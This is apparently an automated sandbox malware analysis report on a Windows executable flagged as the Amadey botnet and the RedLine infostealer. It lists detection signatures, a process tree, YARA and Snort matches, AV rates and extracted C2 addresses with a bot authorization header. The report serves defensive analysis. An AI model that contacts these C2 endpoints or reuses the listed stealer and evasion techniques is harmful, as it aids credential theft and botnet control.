Windows Analysis Report
y0EWt2mE9h.exe

Overview

General Information

Sample Name:y0EWt2mE9h.exe
Original Sample Name:0588e4e46299165692a58b2046b3ea12.exe
Analysis ID:815074
MD5:0588e4e46299165692a58b2046b3ea12
SHA1:642675b7bf9a5897ad906bc1b5f820250ec1b41d
SHA256:f45dd70543ccbc73be3743bac6f7e35179e5192bdd121504d129b74d1ae74996
Tags:Amadey, exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadey's stealer DLL
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • y0EWt2mE9h.exe (PID: 1332 cmdline: C:\Users\user\Desktop\y0EWt2mE9h.exe MD5: 0588E4E46299165692A58B2046B3EA12)
    • shS06Up82.exe (PID: 4124 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe MD5: 1D818CDC54AEBE2E587F77D717B0D1C0)
      • sSH13Pp30.exe (PID: 1324 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe MD5: 611B6D7CD33B7C08EFA3757F4080FF78)
        • smi53cv51.exe (PID: 1212 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe MD5: 830F4723EC8EAD8F959AF2AC394E2E8F)
          • iGb20db.exe (PID: 4788 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe MD5: 19C22162FD676451E1967474A4076E6F)
          • kLL28QE.exe (PID: 2992 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe MD5: 3C88EF8689CBDA12A3A7C5D586E5FA04)
  • rundll32.exe (PID: 4332 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3760 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1008 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 2492 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.233.20.15/dF30Hn4m/index.php", "Version": "3.67"}
{"C2 url": "193.233.20.23:4124", "Bot Id": "rodik", "Authorization Header": "59b6e22e7cfd9b5fa0c99d1942f7c85d"}
Source: dump.pcap, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: dump.pcap, Rule: JoeSecurity_RedLine_1, Description: Yara detected RedLine Stealer, Author: Joe Security

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe, Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Author: Joe Security

Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x2da92:$pat14: , CommandLine:
  • 0x1fb77:$v2_1: ListOfProcesses
  • 0x1e29d:$v4_3: base64str
  • 0x1e25c:$v4_4: stringKey
  • 0x1e2a7:$v4_5: BytesToStringConverted
  • 0x1e292:$v4_6: FromBase64
  • 0x1f832:$v4_8: procName
  • 0x1cf84:$v5_5: FileScanning
  • 0x1d1a2:$v5_7: RecordHeaderField
  • 0x1d0d4:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Source: 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Author: unknown, Strings:
  • 0x1118:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security

Source: 6.2.kLL28QE.exe.4a46ebe.3.raw.unpack, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 6.2.kLL28QE.exe.4a46ebe.3.raw.unpack, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x2da92:$pat14: , CommandLine:
  • 0x1fb77:$v2_1: ListOfProcesses
  • 0x1e29d:$v4_3: base64str
  • 0x1e25c:$v4_4: stringKey
  • 0x1e2a7:$v4_5: BytesToStringConverted
  • 0x1e292:$v4_6: FromBase64
  • 0x1f832:$v4_8: procName
  • 0x1cf84:$v5_5: FileScanning
  • 0x1d1a2:$v5_7: RecordHeaderField
  • 0x1d0d4:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Source: 6.2.kLL28QE.exe.4a47da6.2.unpack, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 6.2.kLL28QE.exe.4a47da6.2.unpack, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x2adaa:$pat14: , CommandLine:
  • 0x1ce8f:$v2_1: ListOfProcesses
  • 0x1b5b5:$v4_3: base64str
  • 0x1b574:$v4_4: stringKey
  • 0x1b5bf:$v4_5: BytesToStringConverted
  • 0x1b5aa:$v4_6: FromBase64
  • 0x1cb4a:$v4_8: procName
  • 0x1a29c:$v5_5: FileScanning
  • 0x1a4ba:$v5_7: RecordHeaderField
  • 0x1a3ec:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Source: 6.3.kLL28QE.exe.3170000.0.raw.unpack, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security

                    No Sigma rule has matched
Timestamp: 02/25/23-09:08:56.956124
Source IP: 193.233.20.23
Destination IP: 192.168.2.5
SID: 2043234
Source Port: 4124
Destination Port: 49703
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/25/23-09:08:55.914790
Source IP: 192.168.2.5
Destination IP: 193.233.20.23
SID: 2043233
Source Port: 49703
Destination Port: 4124
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/25/23-09:09:12.429866
Source IP: 192.168.2.5
Destination IP: 193.233.20.23
SID: 2043231
Source Port: 49703
Destination Port: 4124
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: y0EWt2mE9h.exe, ReversingLabs: Detection: 69%
Source: y0EWt2mE9h.exe, Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe, ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe, Virustotal: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe, ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe, Virustotal: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe, ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe, Virustotal: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe, ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe, Virustotal: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe, ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe, Virustotal: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe, ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe, ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe, ReversingLabs: Detection: 46%
Source: y0EWt2mE9h.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe, Joe Sandbox ML: detected
Source: 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.23:4124", "Bot Id": "rodik", "Authorization Header": "59b6e22e7cfd9b5fa0c99d1942f7c85d"}
Source: 0.3.y0EWt2mE9h.exe.49c3020.0.raw.unpack, Malware Configuration Extractor: Amadey {"C2 url": "193.233.20.15/dF30Hn4m/index.php", "Version": "3.67"}
Source: C:\Users\user\Desktop\y0EWt2mE9h.exe, Code function: 0_2_00E72F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00E72F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe, Code function: 1_2_003E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_003E2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe, Code function: 2_2_000E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_000E2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe, Code function: 3_2_00A62F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_00A62F1D

Compliance

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe, Unpacked PE file: 6.2.kLL28QE.exe.400000.0.unpack
Source: y0EWt2mE9h.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: y0EWt2mE9h.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: y0EWt2mE9h.exe, smi53cv51.exe.2.dr, sSH13Pp30.exe.1.dr, shS06Up82.exe.0.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: y0EWt2mE9h.exe, 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, rTV61uz75.exe.0.dr
Source: Binary string: wextract.pdbGCTL source: y0EWt2mE9h.exe, smi53cv51.exe.2.dr, sSH13Pp30.exe.1.dr, shS06Up82.exe.0.dr
Source: Binary string: C:\sabaje resi\huwa\vacelij.pdb source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000000.344148282.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, nNy98cB79.exe.1.dr, kLL28QE.exe.3.dr
Source: Binary string: ^C:\wipirud\pudakucatured\mutuludo\hazucocuhu gat\jez.pdbPg source: sSH13Pp30.exe, 00000002.00000003.308887660.0000000004B4A000.00000004.00000020.00020000.00000000.sdmp, mzc23WZ.exe.2.dr
Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, iGb20db.exe, 00000004.00000000.310286886.0000000000692000.00000002.00000001.01000000.00000007.sdmp, iGb20db.exe.3.dr
Source: Binary string: 0C:\sabaje resi\huwa\vacelij.pdbPg source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000000.344148282.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, nNy98cB79.exe.1.dr, kLL28QE.exe.3.dr
Source: Binary string: _.pdb source: kLL28QE.exe, kLL28QE.exe, 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\wipirud\pudakucatured\mutuludo\hazucocuhu gat\jez.pdb source: sSH13Pp30.exe, 00000002.00000003.308887660.0000000004B4A000.00000004.00000020.00020000.00000000.sdmp, mzc23WZ.exe.2.dr
Source: C:\Users\user\Desktop\y0EWt2mE9h.exe, Code function: 0_2_00E72390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00E72390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe, Code function: 1_2_003E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_003E2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe, Code function: 2_2_000E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_000E2390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe, Code function: 3_2_00A62390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00A62390

Networking

Source: Traffic, Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49703 -> 193.233.20.23:4124
Source: Traffic, Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49703 -> 193.233.20.23:4124
Source: Traffic, Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.23:4124 -> 192.168.2.5:49703
Source: Malware configuration extractor, URLs: 193.233.20.15/dF30Hn4m/index.php
Source: Malware configuration extractor, URLs: 193.233.20.23:4124
Source: Joe Sandbox View, ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
Source: Joe Sandbox View, IP Address: 193.233.20.23
Source: global traffic, TCP traffic: 192.168.2.5:49703 -> 193.233.20.23:4124
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.000000000501B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
